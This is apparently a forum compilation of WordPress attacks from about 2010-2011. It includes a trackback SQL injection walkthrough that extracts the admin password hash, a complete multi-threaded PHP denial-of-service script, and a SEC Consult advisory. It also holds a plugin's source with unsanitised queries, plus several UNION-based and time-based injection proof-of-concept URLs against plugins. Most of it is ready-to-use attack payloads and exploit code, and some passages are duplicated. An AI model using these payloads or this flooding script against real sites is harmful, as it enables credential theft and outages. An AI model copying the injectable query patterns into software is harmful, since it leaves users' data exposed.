UPDATE Dec 1, 2010: This vulnerability was first discovered by M4g and is described in this  
article.  
    
The do_trackbacks() function in wp-includes/comment.php does not properly escape the input that  
comes from the user, allowing a remote user with publish_posts and edit_published_posts  
capabilities to execute an arbitrary SELECT SQL query, which can lead to disclosure of any  
information stored in the WordPress database.  
    
function do_trackbacks($post_id) {  
     global $wpdb;  
     
     $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );  
     $to_ping = get_to_ping($post_id);  
     $pinged  = get_pung($post_id);  
     if ( empty($to_ping) ) {  
         $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );  
         return;  
     }  
     
     if ( empty($post->post_excerpt) )  
         $excerpt = apply_filters('the_content', $post->post_content);  
     else  
         $excerpt = apply_filters('the_excerpt', $post->post_excerpt);  
     $excerpt = str_replace(']]>', ']]>', $excerpt);  
     $excerpt = wp_html_excerpt($excerpt, 252) . '...';  
     
     $post_title = apply_filters('the_title', $post->post_title);  
     $post_title = strip_tags($post_title);  
     
     if ( $to_ping ) {  
         foreach ( (array) $to_ping as $tb_ping ) {  
             $tb_ping = trim($tb_ping);  
             if ( !in_array($tb_ping, $pinged) ) {  
                 trackback($tb_ping, $post_title, $excerpt, $post_id);  
                 $pinged[] = $tb_ping;  
             } else {  
                 $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );  
             }  
         }  
     }  
}  
    
The $tb_ping variable is passed to the query in line 1657 unescaped.  
    
Exploitation. The logged in user must have publish_posts and edit_published_posts capabilities  
(this corresponds to the Author role).  
    
First, the user creates a new post (title/content does not matter); text to put into the “Send Trackbacks” field is:  
    
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’    
    
and publishes it. He needs to wait a bit — for wp-cron.php to process the trackback. The get_to_ping() function says that this trackback is to be processed:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
Then the user goes back and edits the post.  
    
Now the user duplicates the text in the “Send Trackbacks” field and updates the post:  
    
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’    
    
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’    
    
The get_to_ping() function says that these trackbacks are to be processed:  
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'    
    
Query logging shows that WordPress executes this query (reformatted for the sake of readbility):  
    
UPDATE wp_posts  
SET to_ping = TRIM(REPLACE(to_ping, 'AAA','')),post_title=(select/**/concat(user_login,'|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,'  ', ''))  
WHERE ID = 11  
    
After that when the user refreshes the page (he may need to wait a bit for wp-cron.php to complete), the admin information is shown in the input box.  
    
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.  
The screenshots above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.  
    
Likewise, any information (login salt, nonce salt, email addresses etc) can be disclosed.  
The examples above are for WordPress 3.0.1 but the vulnerability seems to exist since 2.x branch.

<?php  

// Curl php5 <img src="http://s49.ucoz.net/sm/1/wink.gif" border="0" align="absmiddle" alt="wink" />  

function info()  
{  
     echo "##################################################  ################\n";  
     echo "# Wordpress 3.0.1 - Remote Denial Of Service Exploit\n";  
     echo "# Author: KnocKout\n";  
     echo "# Greatz : DaiMon,BARCOD3\n";  
     echo "##################################################  ################\n";  
     echo "# php poc.php target\n";  
     echo "# php poc.php http://www.victim.com/PATH/ 20 5\n";  
     echo "________________________________________\n";  
     exit;  
}  

if($argc !== 4 || !preg_match('#^\d+$#', $argv[2]) || !preg_match('#^\d+$#', $argv[3]))  
{  
     info();  
}  

$url = $argv[1];  
$threads = (int) $argv[2];  
$timeout = (int) $argv[3];  

$ptimeout = $timeout * 100;  

$packet = implode('+', range(100,999));  

while(1)  
{  
     $m = curl_multi_init();  

     for($i = 0; $i < $threads; $i++)  
     {  
         $c[$i] = curl_init();  
         $opts = array  
         (  
             CURLOPT_URL        => $url . 'wp-links-opml.php?link_cat=--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0--0-0-0-0-0-0-0-0-0-0-0',  
             CURLOPT_USERAGENT    => 'Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.5.24 Version/10.52',  
             CURLOPT_ENCODING    => 'gzip, deflate',  
             CURLOPT_POST        => 1,  
             CURLOPT_POSTFIELDS    => 'search_keywords='. $packet .'000000000000000000000000000000000000000000000000  0000000000000000000000000000000000000000000',  
             CURLOPT_RETURNTRANSFER    => 1,  
             CURLOPT_TIMEOUT        => $timeout,  
         );  
         curl_setopt_array($c[$i], $opts);  
         curl_multi_add_handle($m, $c[$i]);  
     }  

     $t = 0;  
     do  
     {  
         curl_multi_exec($m, $r);  
         usleep(100000);  

         $t++;  

         if($t > $ptimeout)  
         {  
             curl_multi_close($m);  
             for($i = 0; $i < $threads; $i++)  
             {  
                 curl_close($c[$i]);  
             }  
             break;  
         }  
     }  
     while($r > 0);  

     echo '.';  
}  
?>

SEC Consult Vulnerability Lab Security Advisory < 20110701-0 >
==================================================  =====================
               title: Multiple SQL Injection Vulnerabilities
             product: WordPress
  vulnerable version: 3.1.3/3.2-RC1 and probably earlier versions
       fixed version: 3.1.4/3.2-RC3
              impact: Medium
            homepage: http://wordpress.org/
               found: 2011-06-21
                  by: K. Gudinavicius                             
                      SEC Consult Vulnerability Lab
                      https://www.sec-consult.com
==================================================  =====================
   
Vendor description:
-------------------
"WordPress was born out of a desire for an elegant, well-architectured
personal publishing system built on PHP and MySQL and licensed under
the GPLv2 (or later). It is the official successor of b2/cafelog.
WordPress is fresh software, but its roots and development go back to
2001."
   
Source: http://wordpress.org/about/
   
   
   
Vulnerability overview/description:
-----------------------------------
Due to insufficient input validation in certain functions of WordPress
it is possible for a user with the "Editor" role to inject arbitrary
SQL commands. By exploiting this vulnerability, an attacker gains
access to all records stored in the database with the privileges of the
WordPress database user.
   
   
   
Proof of concept:
-----------------
1) The get_terms() filter declared in the wp-includes/taxonomy.php file
does not properly validate user input,  allowing an attacker with
"Editor" privileges to inject arbitrary SQL commands in the "orderby"
and "order" parameters passed as array members to the vulnerable filter
when sorting for example link categories.
   
The following URLs could be used to perform blind SQL injection
attacks:
   
http://localhost/wp-admin/edit-tags.php?taxonomy=link_category&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=post_tag&orderby=[SQL
injection]&order=[SQL injection]
http://localhost/wp-admin/edit-tags.php?taxonomy=category&orderby=[SQL
injection]&order=[SQL injection]
   
   
2) The get_bookmarks() function declared in the
wp-includes/bookmark.php file does not properly validate user input,
allowing an attacker with "Editor" privileges to inject arbitrary SQL
commands in the "orderby" and "order" parameters passed as array
members to the vulnerable function when sorting links.
   
The following URL could be used to perform blind SQL injection attacks:
   
http://localhost/wp-admin/link-manager.php?orderby=[SQL
injection]&order=[SQL injection]
   
   
Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in version 3.1.3 of
WordPress, which is the most recent version at the time of discovery.
   
   
Vendor contact timeline:
------------------------
2011-06-22: Contacting vendor through security () wordpress org
2011-06-22: Vendor reply, sending advisory draft
2011-06-23: Vendor confirms security issue
2011-06-30: Vendor releases patched version
2011-07-01: SEC Consult publishes advisory
   
   
   
Solution:
---------
Upgrade to version 3.1.4 or 3.2-RC3
   
   
Workaround:
-----------
A more restrictive role, e.g. "Author", could be applied to the user.
   
   
   
Advisory URL:
-------------
https://www.sec-consult.com/en/advisories.html
   
   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
   
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
   
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
   
EOF K. Gudinavicius / @2011

<?php  
/*  
Plugin Name: AlixcaN LiveFeed  
Plugin URI: http://www.alixcan.net/wordpress/eklentiler/wordpress-canli-yayin-eklentisi-v1-0  
Description: Alixcan.Net Wordpress sitenizden facebook, twitter tarzı feedler atmanızı sağlayan sistem.  
Version: 1.0  
Author: AlixcaN | Alican Ertürk  
Author URI: http://www.alixcan.net  
*/  

$pluginadi = $_GET['plugin'];  
$parcala = explode('_',$pluginadi);  
if($_GET['action'] == 'activate' && $parcala[0]=='alixcan' && $parcala[1]=='live'){  
     mysql_query("  
CREATE TABLE IF NOT EXISTS `wp_alixlivefeed` (  
   `id` int(11) NOT NULL AUTO_INCREMENT,  
   `baslik` varchar(225) COLLATE utf8_turkish_ci NOT NULL,  
   `resim` text COLLATE utf8_turkish_ci NOT NULL,  
   `date` datetime NOT NULL,  
   PRIMARY KEY (`id`)  
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_turkish_ci AUTO_INCREMENT=1 ;  
");  
}  

function alixcan_live_feed_ali() {  
if(isset($_GET['feedlist']) == 'alix_feed_list'){  
         $sayfa_basina = 10;  
     $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");  
     $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);  
       
     $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;  
     $basla = ($sayfa - 1) * $sayfa_basina;  
       
     $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");  
     if(mysql_num_rows($sql)>0){echo '<h3>Gönderdiğiniz Feedler</h3>  
     <table cellpadding="5" style="border:1px solid #ddd; margin-bottom:5px;" cellspacing="5">  
     <tr>  
         <td style="width:5%; font-weight:bold">ID</td>  
         <td style="width:70%; font-weight:bold">Mesaj</td>  
         <td style="width:25%; font-weight:bold">Tarih</td>  
     </tr>  
     ';  
         while ($row = mysql_fetch_object($sql)){  
             echo '<tr>';  
                     echo '<td>'. $row->id.'</td>';  
                     echo '<td>'.$row->baslik.'</td>';  
                     echo '<td>'.$row->date.'</td>';  
             echo '</tr>';  
         }  
     }      
     echo '</table>';  
if($sayfalar>=1 && $sayfa <= $sayfalar){  
echo '<div class="sayfalar">Sayfalar: ';  
     $link = 'index.php?feedlist=alix_feed_list&';  
     for($x=1; $x<=$sayfalar; $x++){  
       
         echo '<a href="'.$link.'alix_sayfa='.$x.'">';  
         echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';  
         echo '</a>';  
     }  
echo '</div>';  
}  
       
       
       
     echo '<p><a id ="upload_image" href="index.php">Feed Gönder</a></p>';  
}elseif(isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live'){  
     echo '<p>  
         Kullanımı Cok Basit Ve Bloğuna Bağlı Bir Yazar İçin Gayet Hoş Bir Eklenti.<br />  
         Facebooktaki "Ne Düşünüyorsunuz?" Mantığı İle Benzer. Bir Yazı, Resim Veya Hem Yazı Hem Resim Paylaşma İmkanı Sağlamaktadır.<br />  
         Bu Yazıları  
         <p style="margin-left:15px;">  
                   [alixcan_live_feed] - Tüm Yazıları Listeler  
             <br />[alixcan_live_feed id=""] - Belirlediğiniz Yazıyı İstediğiniz Yerde Listeler  
         </p>  
         Yukarıdaki Shortcodeları Kullanarak İstediğiniz Şekilde Listeletebilirsiniz.  
     </p>';  
} else{ ?>  

<?php if($_POST['submittwit']){  

$baslik    = $_POST['baslik'];  
$resim    = $_POST['upload_image'];  
$date   = $_POST['date'];  
global $wpdb;  

$veri_dizisi = array(  
         'baslik' => $baslik,   
         'resim'     => $resim,  
         'date'   => $date  
         );  
$wpdb->insert( 'wp_alixlivefeed', $veri_dizisi );  
echo 'Yazı Eklendi';  

} /*submittwit bitimi */?>  
<script>  
     jQuery(document).ready(function() {  

     jQuery('#upload_image_button').click(function() {  
      formfield = jQuery('#upload_image').attr('name');  
      tb_show('', 'media-upload.php?type=image&TB_iframe=true');  
      return false;  
     });  

     window.send_to_editor = function(html) {  
      imgurl = jQuery('img',html).attr('src');  
      jQuery('#upload_image').val(imgurl);  
      tb_remove();  
     }  
     });  
</script>  

<form action="" enctype="multipart/form-data" method="POST">  
       
     <p>  
         <label for="baslik">Başlık:<span style="color:red;font-size:9px">En Fazla 255 Karakter</span></label><br />  
         <input type="text" name="baslik" id="baslik" style="width:100%" />  
     </p>  
     <p>  
         <label for="upload_image">Resim:</label><br />  
         <input id="upload_image" type="text" size="36" name="upload_image" value="" />  
         <input id="upload_image_button" type="button" value="Resim Yükle" /><br />  
         Resim Dosyası Yükleyebilirsiniz Yada Direk Link Yazabilirsiniz.<span style="display:block;font-size:9px;color:red;">Dosya Yüklendikten Sonra Yazıya Dahil Et Butonuna Basınız Link Otomatik Eklenicektir</span>  
     </p>  
         <input type="hidden" id="date" name="date" value="<?php echo date("Y-m-d G:i:s");?>" />  
     <p class="submit">  
         <input type="submit" name="submittwit" id="submittwit" />  
     </p>  

</form>  
<p><a id ="upload_image" href="index.php?feedlist=alix_feed_list">Feedleri Listele</a></p>  
<?php  
} // else  
}  // function  

function alixcan_live_feed_setup() {  
     $yazi = (isset($_GET['edit']) == 'dashboard_alix_live#dashboard_alix_live') ? '<a href="index.php">Kapat</a>' : '<a href="index.php?edit=dashboard_alix_live#dashboard_alix_  live" class="edit-box open-box">Hakkında</a>';  
     wp_add_dashboard_widget( 'alixcan_live_feed_ali', __( 'Canlı Yayın & Live Feed<span class="postbox-title-action">'.$yazi.'</span>' ), 'alixcan_live_feed_ali' );  
}  
add_action('wp_dashboard_setup', 'alixcan_live_feed_setup');  

function head_ekle(){  
     echo '<link rel="stylesheet" href="'.WP_PLUGIN_URL.'/alixcan_live_f/style.css" type="text/css" />';  
}  
add_action('wp_head', 'head_ekle');  

add_shortcode('alixcan_live_feed', 'alixcan_live_feed_shortcode');  
function alixcan_live_feed_shortcode( $atts, $content = null){  
     global $post;  
     extract( shortcode_atts( array( 'id' => '' ) , $atts ) );  

     if(empty($id)){  
               
            
     $sayfa_basina = 10;  
     $sayfa_sor = mysql_query("SELECT COUNT(`id`) FROM `wp_alixlivefeed`");  
     $sayfalar = ceil(mysql_result($sayfa_sor,0) / $sayfa_basina);  
       
     $sayfa = (isset($_GET['alix_sayfa'])) ? (int)abs($_GET['alix_sayfa']) : 1;  
     $basla = ($sayfa - 1) * $sayfa_basina;  
       
     $sql = mysql_query("SELECT * FROM wp_alixlivefeed LIMIT $basla,$sayfa_basina");  
     if(mysql_num_rows($sql)>0){echo '<div id="alixcan">  
             <ul id="list">';  
     while ($row = mysql_fetch_object($sql)){  
         echo '<li>';  
                     echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';  
                     echo $row->baslik.'<br /><em>'.$row->date.'</em>  
                     <div style="clear:both;"></div>  
                     </li>  
                     ';  
     }echo '</ul>';  
     }else{  
         echo '<div style="display:block;float:none;">Henüz İçerik Girilmemiş</div>';  
     }  
       
       
if($sayfalar>=1 && $sayfa <= $sayfalar){  
echo '<div class="sayfalar">Sayfalar: ';  
     $link = get_option('home'). '?p='. get_the_ID();  
     for($x=1; $x<=$sayfalar; $x++){  
       
         echo '<a href="'.$link.'&alix_sayfa='.$x.'">';  
         echo ($x == $sayfa) ? '<span>'.$x.'</span> ': '<em>'.$x.'</em> ';  
         echo '</a>';  
     }  
echo '</div>';  
}  
     echo '</div>';  
    
     }else{  
           
          $sqlsor = mysql_query("SELECT * FROM wp_alixlivefeed WHERE id='$id'");  
             $row = mysql_fetch_object($sqlsor);  
             echo '<div id="alixcan">  
             <ul id="list">';  
             echo '<li>';  
             echo (!empty($row->resim)) ? '<a href="'.$row->resim.'" target="_blank" title="'.$row->baslik.'"><img src="'.$row->resim.'" /></a>' : '';  
             echo $row->baslik.'<br /><em>'.$row->date.'</em>  
             <div style="clear:both;"></div>  
             </li>  
             </ul>  
             </div>';  
           
     }//else  
}// func biter

# Exploit Title: ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/proplayer.4.7.7.zip
# Version: 4.7.7 (tested)
   
---
PoC
---
http://www.site.com/wp-content/plugins/proplayer/playlist-controller.php?pp_playlist_id=-1') UNION ALL SELECT NULL,NULL,@@version--%20
   
---------------
Vulnerable code
---------------
function getPlaylist($id = '') {
     $query = mysql_query("SELECT * FROM ".$this->tablePrefix."proplayer_playlist WHERE (POST_ID='$id')");
     $playlistRow = mysql_fetch_row($query);
       
     return $this->withBackwardCompatibility($playlistRow[2]);
}
   
...
   
if (!empty($_GET["pp_playlist_id"])) {
     header("Content-type: application/xml");
     $xml = $playlistController->getPlaylist($_GET["pp_playlist_id"]);

# Exploit Title: WordPress IP-Logger plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip
# Version: 3.0 (tested)
   
---
PoC
---
http://www.site.com/wp-content/plugins/ip-logger/map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1
   
---------------
Vulnerable code
---------------
$sql = sprintf("select stamp,ip_v4,url,user_agent,Provider,Code3,Country,  Blocked,Ignored from $table_name
   where Latitude=%s and Longitude=%s and Blocked = '%s'
   order by stamp asc limit 50",
   $_REQUEST["lat"],
   $_REQUEST["lon"],
   $_REQUEST["blocked"]);
   
$res = mysql_query($sql);

# Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip
# Version: 3.0 (tested)
# Note: user has to be logged in as "admin"
---
PoC
---
http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,11  2))),0)
   
---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
  $id = $_GET['id'];
  mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");

.....  
         $dj_ids = $wpdb->get_results("SELECT `meta`.`user_id` FROM ".$wpdb->prefix."usermeta AS `meta`  
                    WHERE `meta_key` = 'shifts'   
                    AND `meta_value` LIKE '%".$sDayTime."%';"     
                    );  

.....  

         foreach($dj_ids as $id) {  
             $fetch = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."users AS `user` WHERE `user`.`ID` = ".$id->user_id.";");  
               
             $djs[] = $fetch;  
         }  
     .....

http://wp/?dj-on-air=users&sdate=21-06-1945%+UNION+SELECT+1,2,3,4,5,group_concat(user_log  in,0x3a,user_pass+separator+0x3c62723e)+FROM+wp_us  ers+WHERE+ID+IN+(SELECT+user_id+FROM+wp_usermeta+W  HERE+meta_value=0x613A313A7B733A31333A2261646D696E  6973747261746F72223B623A313B7D)--+

Blind SQLi @ wppa-functions.php:  

Код:

function wppa_crumb_page_ancestors($sep, $page = '0') {
global $wpdb;
global $wppa;
   
  $query = "SELECT post_parent FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $page . " LIMIT 0,1";
  $parent = $wpdb->get_var($query);
  if (!is_numeric($parent) || $parent == '0') return;
  wppa_crumb_page_ancestors($sep, $parent);
  $query = "SELECT post_title FROM " . $wpdb->posts . " WHERE post_type = 'page' AND post_status = 'publish' AND id = " . $parent . " LIMIT 0,1";
  $title = $wpdb->get_var($query);
  if (!$title) {
   $title = '****';  // Page exists but is not publish
   $wppa['out'] .= wppa_nltab().'<a href="#" class="wppa-nav-text b30" style="'.__wcs('wppa-nav-text').'" ></a>';
   $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b31" style="'.__wcs('wppa-nav-text').'" >'.$title.$sep.'</span>';
  } else {
   $wppa['out'] .= wppa_nltab().'<a href="'.get_page_link($parent).'" class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$title.'</a>';
   $wppa['out'] .= wppa_nltab().'<span class="wppa-nav-text b32" style="'.__wcs('wppa-nav-text').'" >'.$sep.'</span>';
  }
}